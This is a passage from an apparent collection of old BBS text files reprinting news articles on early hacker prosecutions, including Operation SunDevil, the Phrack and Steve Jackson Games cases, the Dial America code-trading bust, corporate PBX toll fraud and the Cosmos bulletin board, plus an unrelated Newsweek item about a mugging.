prosecuted. The EFF and the Washington based Computer Professionals 
for Social Responsibility (CPSC) both back the amendment.

	The most famous example of such "recklessness" is the case of 
Cornell graduate student Robert Morris Jr., who designed a program to 
break into the Internet system in an attempt, Barlow says, to map the 
almost unbelievably complex network (no one knows how many 
computers are hooked up to it or where they are). But the program 
written by Morris had a bug in it, and rather than mapping the 
system, it endlessly reproduced itself on computers around the 
country, temporarily bringing the Internet system to a halt. No data 
was destroyed, but valuable computing time was lost.

	"You don't want to send somebody like that to jail for 30 years 
because he wrote a bad program," Barlow says.

	Barlow - who doesn't say how he'd feel if it were his data being 
trashed - is not alone in his judgment. Surprisingly, even some in the 
corporate world that so fears and loathes the new pioneers think that 
there may be an alternative. (It is obviously in the corporate interest 
to have information - and the free flow of communication - controlled 
as tightly as possible; after all knowledge is power and power is 
money).

	Whatever else you can say about hacking, there is no question 
that it requires a gifted intellect, cleverness and hard work - all 
qualities prized and encouraged by American society. So if you can't 
stop the hackers - and no matter how hard it tries, nor how many civil 
liberties it steps on, the government doesn't seem able to - why not 
put them to good use?

	At least one expert from an unlikely quarter agrees. Dorothy E. 
Denning, of Digital Equipment Corporation (DEC), has prepared a paper 
to be presented to the National Computer Conference in Washington 
next month in which she recommends that she and her fellow security 
professionals "work closely with hackers."

	Denning has a truly novel idea: systems managers who obtain 
access to a supposedly secure system to leave a "calling card," 
explaining how they broke in.

	"This approach could have the advantages of not only letting the 
hackers contribute to the security of the system, but of allowing the 
managers to quickly recognize the malicious hackers, since they are 
unlikely to leave their cards. Perhaps if hackers are given the 
opportunity to make contributions outside the underground, this will 
dampen their desire to pursue illegal activities," she writes.

	It's hard to imagine the large corporations going along with this 
clever but quirky idea. "Corporations that feel they've been affected 
have voiced strong demands for government action," Kapor says. To 
wit: at least 10 corporations aided the feds in Operation SunDevil.

No sympathy for the Devil

	During Operation SunDevil numerous BBS's were shut down and 
40 computers and the equivalent of more than five million pages of 
information were swept up. Since then, there have been many more 
raids and seizures just as egregious, but they have received less 
publicity. And the campaign shows no signs of abating.

	With large corporations pressuring elected officials to take 
action, the law has its work cut out for it. There are tens of thousands 
of BBS's and national computer networks in this country, and most of 
them can be interlinked. Log on to one network, and you can travel 
the globe - and you won't be alone. According to the New York Times, 
Internet carried the equivalent of about half a trillion keyboard 
strokes in July alone.

	Anyone with a home computer and a modem can log on to a BBS 
and join discussions on, say, new computer projects and movies; copy 
"freeware" and "shareware," software in the public domain; or 
contribute to talks on topics such as ham radio, the Holocaust, good 
dinners, or travel in Europe. You can either "post" a message for all to 
read, or send private electronic mail ("e-mail") to a fellow BBS 
member or to the BBS's system operator (generally the person who's 
set up the board). If you've got some kind of computer question, just 
post it on the BBS and you'll get a dozen good suggestions.

	Or, for a fee, you can hook up to a national computer network. 
Once connected to the GEnie network (operated by General Electric), 
for example, you can, among other things, join roundtable discussions 
on subjects ranging from investments to photography, send and 
receive e-mail, play on-line games against other members, read up-to-
the-minute wire-service reports, access an encyclopedia, copy one of 
hundred of programs, get stock quotes, make airline reservations, and 
buy jewelry from Tiffany.

	In other words, you could spend the rest of your life wandering 
around the net and never retrace your steps.

	Of course, these days chances are you'll bump into some folks 
who have no business joining the club. Following a Freedom of 
Information Act request earlier this year from Representative Don 
Edwards (D-California), the Secret Service admitted to Congress that its 
agents, posing as legitimate users, were secretly monitoring BBS's. And 
though reading messages posted to the public is not illegal, 
government agents' reading and most likely making records of BBS 
conversations is "a little bit like an agent who attends a political rally 
to get information for a file," says CPSR president Marc Rotenberg.

	Barlow likens a BBS to "a village with a continuous town 
meeting in progress 24 hours a day." The US government, he says, is 
"confiscating towns."

	As federal agents scan the BBSs for criminal activity, what other 
small fish might they catch in their nets? Well, for one, the Secret 
Service, in response to Edward's FOIA request, admitted it has a new 
Computer Diagnostics Center, about which Rotenburg paints this 
frightening picture: the technology is readily available for a computer, 
purring quietly in a corner 24 hours a day, to scan electronic BBSs for 
key words like "hacking" or even key name - like yours - and dump 
every communication it finds with that word into a database. A BBS 
user, entirely unaware, could have a thousand page file on him at the 
Secret Service's disposal in a matter of weeks.

	For its part, the Secret Service denies that the agency is 
undertaking such surveillance, or will. Special agent and Washington 
Secret Service spokesman Richard Adams told the Phoenix, "The only 
folks the Secret Service is targeting are those operators who are using 
or encouraging others in the use of stolen phone-company numbers 
and stolen credit-card numbers."

	"I can assure you we're not randomly searching bulletin 
boards," he said. "We're bound by the courts. You've got to have 
probable cause, as you do in any case, to obtain a search warrant or an 
arrest warrant."

	But what constitutes probable cause? After all, hasn't the US 
Supreme Court ruled repeatedly that speech - and even "encouraging 
others," as agent Adams put it - is protected under the First 
Amendment unless it is "likely" to lead to "imminent" criminal 
activity?

	Where, for instance, was probable cause in the case of the 
much-publicized Phrack imbroglio? Which raises an even more 
ominous consideration: does corporate status play a role in 
determining it?

	Say you are a publisher into whose system a stolen document 
falls (a circumstance roughly equivalent to someone's dropping 
purloined papers on a newspapers editor's desk). You publish it. What 
happens to you and your publication?

	If you are Arthur Sulzberger, publisher of the New York Times, 
you publish the Pentagon Papers. The government tries to take action 
against you, but the courts, citing First Amendment, stand foursquare 
behind you.

	If you are Craig Neirdorf, publisher of Phrack, an electronic 
newsletter covering the hackers' world, you, too, publish a stolen 
document. You are arrested by the Secret Service, hit with a seven-
count grand-jury indictment, and the equipment you use to publish - 
along with all your files - is seized. Your publication is out of business.

	Phrack's document was an internal BellSouth memorandum 
describing the company's 911 emergency system. In elegant 
bureaucratese, the document was titled " A Bell South Standard 
Practice (BSP) 660-225-104SV-Control Office Administration of 
Enhanced 911 Services for Special Services and Major Account Centers, 
March 1988." It was plucked from BellSouth's computers and dropped 
into Neirdorf's system, among others, by a hacker named Robert Riggs, 
who was indicted and pleaded guilty to this and other incidents of 
illegal entry. In February 1989, Neidorf, a 20-year-old University of 
Missouri student, included the three-page document in Phrack. 
BellSouth claimed the document was worth exactly $79,449 and by 
being made public could cause potentially fatal disruption of its 911 
system. Neidorf was busted and indicted on felony charges that 
included interstate transmission of stolen goods. Earlier this month, 
the prosecuting US Attorney dropped the charges against Neidorf after 
his attorney proved that all the information in the document was 
already in the public domain and that contained much of the same 
data as the stolen one - and that went into more detail - could be 
obtained by calling an 800 number and paying $13. Neidorf's lawyers 
are considering a civil suit against the government. Neidorf, now in his 
senior year, has no plans to publish another issue of Phrack "in the 
near future," says his attorney.

	According to attorney Beckman, the government was "blaming 
Phrack for what other people might do with the information it would 
publish... It's like a newspaper publishing an article about home 
security systems that someone would use to break into a house."

	"I don't think the government even thought through the First 
Amendment implications," she says.

	Not to mention corporate fallout. As Steve Jackson sees it, "The 
Times was only going up against the military-industrial complex. 
Neidorf pulled the nose of the phone company."

	Sheldon Zenner, the Chicago attorney who represented Neidorf, 
says the legal issue raised by the Phrack case - an illegally obtained 
document appearing on a BBS and the government then seizing the 
BBS - is likely to recur. The Secret Service's press release announcing 
the Operation SunDevil raid calls computer users who gain illegal 
access "a frightening threat" and states that their actions have "serious 
implications for the health and welfare of all individuals, corporations, 
and United States Government agencies relying on computers and 
telephones to communicate." To back up its assertions, the feds add 
that the telephone companies put their losses to stolen phone service 
"as high as 50 million dollars" and that hackers have had access to 
hospital records and "could have added, deleted, or altered vital 
patient information, possibly causing life-threatening situations." As 
Barlow points out, that's a mighty big "could" - especially since no one 
has ever proven that a single patient record has ever been altered by 
a hacker.

	Why do the powers-that-be so fear BBSs? Mark Worthington, of 
Cambridge's MacEast BBS, posted a message saying it's out of 
ignorance, "but I also think they fear them for a much more troubling 
reason. They rightly perceive BBSs as a place where people can 
congregate and communicate without physically meeting... A BBS 
represents the electronic First Amendment right of free assembly, and 
thus constitutes a political threat to the paranoid and powerful."

	Perhaps the most troubling example of the government's blind 
zeal concerns the Jolnet BBS, in Illinois. Its operator, Richard Andrews, 
discovered in storage on his system (again, thanks to Riggs) the 
infamous 911 document that Phrack later published. He suspected 
something illegal and asked the advice of a friend, who notified the 
phone company in an effort to set things right. Government agents 
shut down the Jolnet BBS and seized Andrew's equipment last 
December; they still have yet to return any equipment or to charge 
Andrews.

Ignorance of the law is no excuse

	It was not only Operation SunDevil and the surrounding spate of 
arrests that prompted Barlow to get in touch with Kapor and found 
EFF. Barlow's visit from a technically illiterate FBI agent, which he 
recounts in his article "Crime & Puzzlement" in the fall issue of The 
Whole Earth Review, sealed in his mind the need to take action.

	"It's not until you get your own visit from an FBI agent that you 
realize this isn't an abstract problem," Barlow says. "I came to the 
realization the government was now dealing with things it didn't 
understand."

	Barlow spent two hours with the FBI agent who'd come to 
question him, most of it explaining how computers and networks 
operate. "He took to rubbing his face with both hands, peering up over 
his fingertips, and saying, 'It sure is something, isn't it?' or 'Whoooo-
eee,'" Barlow writes in his story. "Or:'My eight-year-old knows more 
about these things than I do.' He didn't say this with a father's pride 
so much as an immigrant's fear of a strange new land into which he 
will be forcibly moved and in which his own child is native. He looked 
across my keyboard into Cyberspace and didn't like what he saw."

	Kapor and Steve Wozniak, the iconoclastic co-founder of Apple 
Computers, put up the seed money to establish EFF, which has already 
issued its first grant: $275,000 to the Computing and Civil Liberties 
Project of the CPSR. The EFF has filed a freind-of-the-court brief in the 
Neidorf case, and has hired Silverglate & Good to clarify and articulate 
the civil-liberties issue at stake on the electronic frontier.

	Kapor is clear about what the EFF is not. "It's not a hacker-
defense fund," he stresses. "Legally, the big thing now is to figure out 
what we're going to do about these BBS seizures and the reading of 
[electronic] mail" by the Secret Service.

	The EFF's purpose, Kapor says, "is to try to ensure that in a new 
scheme, the public networks will be universal and open, encouraging 
informational entrepreneurship."

	The "hacker ethic," as it was so brilliantly described by Stephen 
Levy in his seminal 1984 book Hackers, is about learning, not stealing. 
(Thus serious hackers' insistence on the term "crackers" for law-
breakers.)

	"When a hacker breaks into a system, the objective is to learn 
and avoid causing damage," DEC's Denning wrote in her paper, 
"Downloaded information [electronically transferred to the hacker's 
computer] is copied, not stolen, and still exists on the original system. 
Moreover, information has traditionally not been regarded as 
property."

Future Shock?

	No matter what the corporations or the feds want, or what 
restrictive steps they may take, Cyberspace isn't going to go away. If 
anything, it will expand. One prominent Apple researcher recently 
predicted that within a few years home computers "50 times more 
powerful" than those now on the market will be available.

	Moreover, the networks themselves are expected to become 
more accessible to the general public. To those ends US Senator Albert 
Gore (D-Tennessee) has proposed in Congress a $1.75 billion bill that 
would fund a supernet to link the nation's universities and 
supercomputers.

	Gore's bill is considered a step toward a nascent high-speed 
national computer network that could potentially reach every home in 
the country. Such a network, the New York Times noted on September 
2, could trigger a "technological transformation that will be every bit 
as profound for America in the next century as the transcontinental 
railroad was in the last." Such a network would cost an estimated $200 
billion.

	Surprisingly, sometimes there is encouraging news from the top 
brass themselves. President George Bush last month removed 
restrictions the previous administration had placed on computer 
access to non-classified federal databases and information collected by 
university researchers and private firms working with the 
government.

	Given this rapid expansion of boundaries, decisions about how 
civil liberties will be protected in a world the Bill of Rights' authors 
could never have foreseen must be made now, by the courts and the 
government. The law-enforcement community and corporations have 
so far shown no sign of letting up their technophobic campaign, and, 
with a few exceptions, civil libertarians seem slow to wake up to the 
issue. The American Civil Liberties Union, for example, has yet to be 
heard from in the Operation SunDevil debate, though it has formed a 
subcommittee on technology.

	The EFF, in its mission statement, recognizes the lack of law and 
legal precedent in the electronic frontier and warns that "in their 
absence, law-enforcement agencies like the Secret Service and FBI, 
acting at the disposal of large information corporations, are seeking to 
create legal precedents which would radically limit Constitutional 
application to digital media."

	"The excesses of Operation SunDevil are only the beginning of 
what threatens to become a long, difficult, and philosophically obscure 
struggle between institutional control and individual liberty."

*end of file


COMPILED FROM NEWSWEEK DEC 23, 1985
 
LOTS OF PEOPLE LOVE NEW YORK'S CEN-
TRAL PARK, BUT FEW LOVE IT AS MUCH
AS MILLIONAIRE GEORGE DELACORTE.
OVER THE YEARS, THE 92-YEAR-OLD
PHILANTHROPIST PAID FOR THE PARK'S
OUTDOOR DELACORTE THEATRE, THE
ANIMATED DELACORTE CLOCK AT THE
PARK'S ZOO AND THE FAMOUS ALICE
IN WONDERLAND STATUE NEAR THE BOAT
POND.
WALKING THROUGH THE PARK ONE MOR-
NING LAST WEEK, DELACORTE AND HIS
WIFE VALERIE, 66, WERE MUGGED BY
KNIFE-WIELDING ATTACKERS WHO TOOK
$200 AND MRS. DELACORTE'S $5,500
MINK COAT -- BRUISING HIS FACE
AND NICKING HER HAND IN THE PRO-
CESS. DELACORTE SAYS THE ATTACK
WON'T ALTER HIS 60-YEAR-OLD CUS-
TOM OF WALKING DAILY THROUGH THE
PARK -- BUT HE *WAS* OFFENDED BY
HIS ASSAILANT'S LACK OF MANNERS.
"AFTER THEY TOOK MY MONEY THEY
COULD HAVE SAID, 'THANKS FOR
BUILDING THAT STATUE'," HE SAID.
"BUT THEY DIDN'T."


             " U.S. computer investigation targets Austinites "
           ------------------------------------------------------



  [ The above caption high-lighted the Saturday March 17, 1990 edition
  of the Austin American-Statesman [ Austin, Texas ].  The article has
  been copied in its entirety, and the main point for typing this up
  was because of the involvement of the LOD/H throughout the article. ]





      The U.S. Secret Service has seized computer equipment from two
 Austin homes and a local business in the past month as part of a federal
 investigation into electronic tampering with the nation's 911 emergency
 network.
      Armed Secret Service agents, accompanied by officers from the Austin
 Police Department, took the equipment in three March 1 raids that sources
 say are linked to a nationwide federal inquiry coordinated by the Secret
 Service and the U.S. attorney's office in Chicago.
      While federal officials have declined to comment on the investigation
  - which focuses on a bizarre mix of science fiction and allegations of
 high-tech thievery - the Austin American-Statesman has learned that the
 raids targeted Steve Jackson Games, a South Austin publisher of role-
 playing games, and the home of Loyd Blankenship, managing editor at the
 company.
      A second Austin home, whose resident was acquainted with Jackson
 officials, also was raided.
      Jackson said there is no reason for the company to be investigated
 .  Steve Jackson Games is a book and game publisher of fiction, he said,
 and it is not involved in any computer-related thefts.
      The agents, executing search warrants now sealed by a judge from
 public view, took computer equipment, including modems, printers, and
 monitors, as well as manuals, instruction books and other documents.  The
 equipment has been forwarded to federal officials in Chicago.
      The Secret Service, best-known for protecting the president, has
 jurisdiction in the case, government officials say, because damage to
 the nation's telephone system could harm the public's welfare.  In
 addition, the system is run by American Telephone & Telegraph Co., a
 company involved in the nation's defense.
      The 911 investigation already has resulted in the indictment of
 two computer "hackers" in Illinois and sources say federal authorities
 now are focusing on Austin's ties to a shadowy underground computer
 user's group known as the Legion of Doom.
      The hackers, who live in Georgia and Missouri, where indicted in
 Chicago.  they are believed to be members of the Legion of Doom and
 are charged with seven counts, including interstate transportation of
 stolen property, wire fraud, and violations of the Computer Fraud and
 Abuse Act of 1986.
      The government alleges that the defendants stole a computerized
 copy of Bell South's system that controls 911 emergency calls in nine
 states.  The information was then transferred to a computer bulletin
 board and published in a hacker publication known as Phrack!
      A trial in the case is scheduled to begin in June.
      U.S. agents also have seized the final drafts of a science
 fiction game written by the Austin-based game company.  Sources say
 the agents are trying to determine whether the game - a dark, futur-
 istic account of a world where technology has gone awry - is being
 used as a handbook for computer crime.  Steve Jackson, the owner of
 the local company and a well-known figure in the role-playing game
 industry, said neither he nor his company has been involved in
 tampering with the 911 system.
      No one in Austin has been indicted or arrested as a result of
 the investigation.  "It is an on-going investigation.  That is all
 I can say," said Steve Beauchamp, special agent-in-charge of the
 Secret Service Austin field office.  "Until we can put it all
 together, we just do not comment," he said.
      Bob Rogers, Jackson's Dallas attorney, said federal officials
 have assured him that neither Jackson nor Jackson Games is the tar-
 get of the probe.  The authorities would not tell Rogers whether the
 inquiry focused on other company employees.  As for the science fiction
 game, called Cyberpunk, Jackson said federal authorities have mistaken
 a fictional work for a technical manual [E.N. Why does this sound all
 too familiar?] .
      "It's not a manual for computer crime any more than a Reader's
 Digest story on how to burglar-proof your house is a manual for
 burglars," said Jackson, 36.  "It's kind of like the hints you get
 on safe-cracking from a James Bond movie."
      Blankenship, the author of the book, said his attorney has advised
 him not to comment on the book or the Secret Service investigation.
      Jackson said he guesses his company was linked to the 911 probe
 by its use of a computer bulletin board system, called Usenet.  The
 board, one of hundreds throughout the country, is a sort of electronic
 Town Square, where personal computer users from throughout the world
 can tap into the system via phone lines and a modem.
      The network, free and relatively unregulated, is an information
 exchange where users can post information, exchange electronic messages
 and debate with keyboards everything from poetry and politics to nuclear
 war.
      One of the world's largest networks - boasting more than 600,000
 users - Usenet was tapped by Chinese students in North America to
 organize support for students during the pro-democracy demonstrations
 last year.  The network also was infected in 1988 by a now-famous
 computer "virus" unleashed by college student Robert Morris.
      Jackson said his company has maintained a bulletin board on
 the Usenet network on which it posts advanced copies of its role-
 playing games.  The firm posts the games and requests that the users
 of the network comment on the text and propose improvements.
      The Jackson bulletin board, called Illuminati, greets users with
 the company's logo and a message that states: "Welcome to the World's
 Oldest and Largest Secret Conspiracy."
      Over the past several months, the company has been posting drafts
 of Cyberpunk for review.
      The resident of the second Austin home raided by the Secret Service
 was acquainted with Jackson and had made comments about the game on
 Usenet.  He asked to remain anonymous.
      Typical of Cyberpunk literature, the game is set in a bleak future,
 much like the world portrayed in Max Headroom, formerly a network
 television program.  Computers and technology control people's thoughts
 and actions and are viewed both as a means of oppression and as a method
 of escape.  Portions of Jackson's Cyberpunk viewed by the Austin American
 Statesman include a detailed discussion on penetrating government computer
 networks and a list of fictitious programs used to break into closed
 networks.  Bruce Sterling, an Austin science fiction writer and one of
 the world's best-known Cyberpunk writers, said Jackson's game and its
 computer-related discussions are hardly unusual for the genre.
      "Cyberpunk is thriller fiction."  Sterling said.  "It deals to a
 great extent with the romance of crime in the same way that mysteries
 or techno-thrillers do."  He said the detailed technical discussions
 in the Jackson games are what draws people to them.  "That's the
 charm of simulating something that's supposed to be accurate.  If
 it's cooked up out of thin air, the people who play these games are
 going to lose interest."
       Jackson, though, said he has been told by Secret Service agents
 that they view the game as a user's guide to computer mischief.  He
 said they made the comments where he went to the agency's Austin
 office in an unsuccessful attempt to reclaim some of his seized
 equipment.  "As they were reading over it, they kept making outraged
 comments," Jackson said. "When they read it, they became very, very
 upset.  "I said, 'This is science fiction.'  They said, 'No.  This
 is real.'"
       The text of the Cyberpunk games, as well as other computer
 equipment taken from Jackson's office, still has not been returned.
 The company now is working to rewrite portions of the book and is
 hoping to have it printed next month.  In addition to reviewing
 Cyberpunk, sources say federal authorities currently are investigating
 any links between local computer hackers and the Legion of Doom.  The
 sources say some of the 911 information that is the subject of Chicago
 indictments has been traced to Austin computers.
       Jackson's attorney said federal officials have told him that
 the 911 information pilfered from Bell South has surfaced on a computer
 bulletin board used at Steve Jackson games.  But the information
 apparently has not been traced to a user.  Jackson said that neither
 he nor any of his employees is a member of the Legion of Doom.
        Blankenship, however, did consult with the group in the
 course of researching the writing the Cyberpunk game, Jackson said.
 Further, the group is listed in the game's acknowledgments for its
 aid in providing technical information used in Cyberpunk.  For these
 reasons he believes Blankenship is a local target of the federal probe,
 though none of the investigators has yet confirmed his suspicion.
       "My opinion is that he is (being investigated)," Jackson said,
 "If that's the case, that's gross.
       "he had been doing research for what he hoped would be a mass-
 market book on the computer underground," Jackson said.
       The other Austin resident raided by the authorities, who asked
 to remain anonymous, acknowledged that he is the founding member of
 the Legion of Doom and that copies of the 911 system had surfaced on
 the group's local bulletin board.  The 20-year-old college student
 said the information hardly posed any threat to the 911 system.
 "It was nothing," he said.  "It was garbage, and it was boring."
       In the Chicago indictment accuses the group of a litany of
 electronic abuses, including: disrupting telephone service by
 changing the routing of telephone calls; stealing and modifying
 individual credit histories; stealing money and property from
 companies by altering computer information; and disseminating
 information about attacking computers to other computer hackers.
       The Austin Legion of Doom member said his group's worst
 crime is snooping through other people's computers.  "For the
 most part, that's all we do," he said.  "No one's out ripping
 off people's credit cards.  No one's out to make any money.
       "We're just out to have fun."
       The group member said the fact that the legion is shrouded
 in mystery adds to its mystique - and to the interest law
 enforcement agents have in cracking the ring.  "It's an entirely
 different world," the student said.  "It's a very strange little
 counter-culture.  "Everybody who exists in that world is familiar
 with the Legion of Doom," he said.  "Most people are in awe or are
 intimidated by it."



                                  (C)opied by Pizzia Man
                                   03/18/90        For all you Hackers out there, This is a very interesting
 collection of words and sentences. What would happen to you if
 you got caught??  ( Like I know, You NEVER Get caught! Neither do
 I )


Recently, here in Cherry Hill, NJ,  a BBS system by the name  "Hackers
Heaven" was closed  down by police.   The sysop(s) and  users of  this
system were trading pirated  programs, unauthorized MCI access  codes,
passwords for  several  computers  in  the  area,  etc.   Unlike  what
happended on the west coast where a  system was used to post a  single
PACIFIC BELL access code without the sysop's knowledge, this sysop was
well aware of the situation, and as far as I know, even supported  it.
(I assume this by rumor, and by what the name suggests).  My viewpoint
differs from  the  situation out  on  the  west coast;  in this  case,
it appears to be the sysops own damned fault!  How  can someone be  as
nieve as  that!  I'm  glad the  sysop out  west was  released  without
charges, but these kids  should go to jail!  It's shit like this  that
gives us sysops a bad name!
    The system was being run  on an Apple IIe  and with only a  simple
questionaire, users were granted access to use.  Rumor also says  that
the FBI  was  also involved  with  some  fake numbers  of  some  sort.
Charges seem to be  based however on theft  of access codes from  Dial
America; a local long-distance company.

-Brian Sietz-
Sysop FIDO#82


The following  is a  reprint  from an  article  by David  Lee  Preston
appearing  in  the  March  12  issue  of  the  Philadelphia  Inquirer.
Editorial notes [] by myself appear within.

    About $35,000  worth of  computer equipment  has been  confiscated
from two homes in Cherry Hill and one in Voorhees Township as part  of
an investigation into  an alleged ring  of youthful computer  hackers,
Camden County Prosecutor Samuel Asbell said yesterday.
    Investigators  with  search  warrants  seized  computers,  modems,
printers, disk  drives,  software  and  other  equipment,  which  four
residents of the  houses allegedly  had used  to gain  access to  Dial
America, a  two-year  old long  distance  telephone service  based  in
Camden, Asbell said.
    Although no arrests  were made during  the Saturday sweep,  Asbell
said his office planned  to charge about 20  South Jersey youths  with
using personal  computers to  make  long-distance calls  through  Dial
America.
    Most of the members of the alleged ring live in Camden County, all
are males, and the oldest is 20, he said.
    Hackers are personal-computer enthusiasts,  often in their  teens,
who use their technical skills to  gain illegal entry into private  or
corporate computer systems.

[Ed: Bullshit!  That is only the derrogitory term for "Hackers".   The
real meaning is more subtle and  not so clearly defined.  Hackers  are
generally  computer  enthusiasts,  most  often  not  associated   with
anything harmful.  Using this definition, I myself am a "hacker"]

    Gade Kreckel, president of Dial  America, said Dial America  began
an investigation in November after a customer reported that there were
several calls on his bill he had not made.
    The firm, in the Wilson  Building on Broadway, used its  computers
to  identify  calls  being  made  with  stolen  account  numbers   and
transferred those calls into fake accounts, he said.
    "Before  the  calls  ever  got  onto  our  customers'  bills,   we
transferred them into  a fraud  account," he said.   "In other  words,
customers get a clean bill."
    The firm turned the case over the prosecutor's office about  three
weeks ago, Kreckel said.  He said the fraudulent calls made during the
investigation cost his firm as much as $6,000.
    Asbell said the alleged hackers  would telephone other hackers  on
computers around the  country and trade  information such as  computer
access codes.
    "We have taped conversations between the computer hackers," Asbell
said.  "We have calls throughout probably most of the United States...
Once you have the access code to Dial America, you can go trade it  to
somebody in  the  state of  Oregon  for the  access  code to  VISA  or
Mastercard."
    Dial America says it has 4,000 customers in Burlington, Gloucester
and Camden Counties.
    "Unless you are from South Jersey, you couldn't use our  service,"
Kreckel said.  "They would get on there and make long-distance  calls.
For example, one says, 'Do you have Pac-Man?  OK, transmit it to  me.'
And in return, he might give him Donkey Kong, then pirate video  games
and send them back and forth."
    The alleged hackers  also were trading  AT&T credit-card  numbers,
Kreckel said.
    The first seizure took place about 7:30AM at the home of a  Cherry
Hill juvenile, Asbell said.  Later that morning, investigators  seized
more equipment from a juvenile in Voorhees, he said.  About 11PM, they
executed a  third  search warrant  at  the  Cherry Hill  home  of  two
brothers, ages 18 and 20, he said.
    At each house, Asbell said, the parents reacted with "actual shock
and dismay as to what was taking place."
    He said  the  parents were  "very  cooperative in  the  first  two
instances"  but  that  the  Cherry  HIll  brothers'  father  initially
resisted the investigators' efforts.
    "They don't realize that stealing from a Dial America, or a Sprint
or MCI, is no different from walking into a 7-Eleven and stealing five
or six thousand dollars," Kreckel said.
    The ability of long-distance  companies to trace fraudulent  usage
has improved measurably in the last year, Kreckel said.
    "When the long distance-industry was  in a different stage a  year
ago, computer hackers found it pretty easy to get into systems without
being detected," he  said.  "But  nowadays, it's such  a stupid  crime
because it's so easy to catch them."
    "The sad part about it is  it's almost 95 percent minors that  are
involved in  this thing.   And that's  the case  with almost  all  the
computer hackers."


The following article is from "Business Week" February 4, 1991.
page 90

****************************************************************

Does Someone Have Your Company's Number?: Phone Hackers are
Tapping PBXs, Running Up Millions in Charges

by Mark Lewyn

*****************************************************************

     When Linda N. Paris opened the August, 1989, phone bill for
Philadelphia Newspapers Inc., the telecommunications manager was
stunned.  On a single day, more than 6,000 calls had been placed
from the telephone switch that serves the company's two papers,
the "Inquirer" and the "Daily News," to numbers in Pakistan,
Egypt, and the Dominican Republic--places Philadelphia reporters
rarely call.  During the month, such calls added up to about
$90,000--nearly a quarter of the Knight-Ridder Inc. unit's entire
phone bill.

     Philadelphia Newspapers was a victim of a relatively new
high-tech crime wave: PBX fraud.  By stealing numerical
passwords, thieves can tap into corporate switchboards, known as
private branch exchanges, or PBXs.  Once inside, they can dial
anywhere-on the victim's tab.  Often, the culprits are drug
dealers, who use PBXs to place hard-to-trace calls.  Others are
shady entrepreneurs, who sell the access numbers on the streets,
usually to immigrants who can't otherwise afford to call home. 
By the time a PBX owner realizes what's going on, there's not
much chance of tracking the criminals down.  "I doubt we'll ever
find them," says Paris of the Philadelphia PBX hackers.

     HEAVY TOLL.  Dozens of companies have been hit, including
Procter & Gamble, Sumitomo Bank, and Christian Broadway Network. 
The cost of companies could be as high as $500 million annually,
estimates Rami Abuhamdeh, executive director of the
Communications Fraud Control Assn., a group of phone companies
and law-enforcement officials.  Abuhamdeh concedes that accurate
loss estimates don't exist but says: "This is one of the fastest-
growing problems in the communications business."

     Toll-call fraud is nothing new.  Since the 1960's, for
example, college students have circulated stolen calling-card
numbers.  But computers at American Telephone & Telegraph, MCI
and U.S. Spring now alert security officials to suspected card
ripoffs in as little as two hours by spotting unusual usage.  And
new technologies have rendered useless the "blue boxes" that
"phone phreaks" once used to place free calls by mimicking the
tone of network switches.

     The corporate PBX is one of the last weak links.  Hackers
start by finding the toll-free 800 number of a particular PBX. 
Then, they determine the code that an employee away from the
office uses to place a long distance call through the switch. 
According to law-enforcement officials, some thieves obtain 800
numbers and passwords by spying on executives using pay phones. 
Others known as "dumpster divers," ransack garbage for numerical
keys to the switching systems.  Some hackers use computer
programs that try thousands of numbers until they hit working
passwords.  For kicks, they sometimes post them on electronic
bulletin boards.

     EVASIVE MANEUVERS.  Thieves who sell the codes are a bigger
problem.  "Call-sell" operations, run from pay phones or out of
apartments, offer illegal toll calling for a cash payment. 
Security officials at MCI Communications Corp. say that call-
selling began in NYC but in the past year has spread to LA,
Chicago, and other cities.  Last April, MCI led investigators to
a man and a woman in upper Manhattan whose call-sell operation
ran up more than $178,000 in charges to unwitting companies. 
They pleaded guilty last fall to state grand larceny and
computer-trespass charges.

     More often, though, the lawbreakers disappear without a
trace.  To evade detection, they use a technique known as
"looping."  They break into one PBX, but instead of dialing the
final destination from there, they tap into a second PBX and then
complete the call.  That makes it harder to track the caller. 
Even if they're caught, PBX hackers usually get off lightly
because judges don't regard such fraud as a major crime.  The two
operators in New York were sentenced to perform community
service.
     
     Long-distance carriers are working with customers to keep
PBX fraud from spreading.  MCI has sent security tips to 250,000
corporate customers.  It suggests lengthening customers.  It
suggests lengthening passwords, to make them harder to figure
out, and blocking the PBX from making international calls if
employees have little need to make them.  Another tip: Shut off
remote access to the PBX during nonbusiness hours.

     Customers have good reason to adopt preventive measures.  So
far, courts have ruled that they're liable for the charges, even
if their employees didn't make the calls.  However, some
companies have persuaded carriers to forgo charges for the stolen
calls.  Christian Broadcasting Network, which in 1987 was hit
with $40,000 in fraudulent calls, "hasn't paid MCI anything,"
says Paul D. Flannigan, CBN's vice-president for information
services.  "I expect it to stay that way."

     Still most customers have no idea how vulnerable they are to
PBX fraud, carriers say.  That means there is a flock of
corporate pigeons ready for phone thieves to pluck.

*****************************************************************

The Big Bills from PBX Fraud
------------------------------
A Sampling of Major Losses


victim                             fraudulent charges
------------------------------------------------------
New York City Human                $704,000
Resources Administration
------------------------------------------------------
Procter & Gamble                   300,000
------------------------------------------------------
Sumitomo Bank                      97,000
------------------------------------------------------
Philadelphia Newspapers            90,000
------------------------------------------------------
Tenessee Valley Authority          65,000
-------------------------------------------------
Christian Broadcasting Network     40,000
-------------------------------------------------

data: company reports, Los Angeles Police Dept.   THE STORY OF C0SMOS
          --------------------
        Downloaded off Scan Line
          --------------------
     Distributed by: Twisted Sector
          --------------------

  The story that follows was reproduced
by the original 'Time Lord' now know to all as The Scanner. Contrary to belief he is not a Fed. In fact he is back on-line again with a new board! 
  
----------------------------------------March 28, 1987 
Edited for Scan Line systems under
C0SMOS communications. 313/851-0912

-----------------------
By Kieth Gave
Free Press Staff Writer
-----------------------
  He called himself The Time Lord and
he ruled 'Cosmos' from a bedroom in his
parents' West Bloomfield home - untill 
the FBI came and shut down the 15 year
old who had masterminded one the coun-
try's most notorious computer bulletin
boards.
  A sophomore at Birmingham Groves High
School, he ran the electronic equival-
ent of a street gang with the Apple //e
computer he recieved as a birthday gift
two years ago.
  The hackers traded information on how
to make bombs and scramble the phone
company. They swapped illegally obtain-
ed credit card numbers that many of  
them used to charge thousands of 
dollars worth of merchandise.
  The youth said only the 'elite'  
among computer hackers frequented his
board, which took the name Cosmos from
Bell Telephone Co's. computer systems.
He is not named here because he is a 
juvenile, he has not been charged and
his parents asked his name not be used.

  "I had about 80 regular users on the 
board" he said, adding that only about
a handful were from the Detroit area.
Probably 75 percent were into credit
card fraud.
  Although Time Lord was not charged,
he was questioned at length by federal
authorities.
  The FBI agent in charge of computer
hackers in the Detroit area would not
comment other then to say the youths
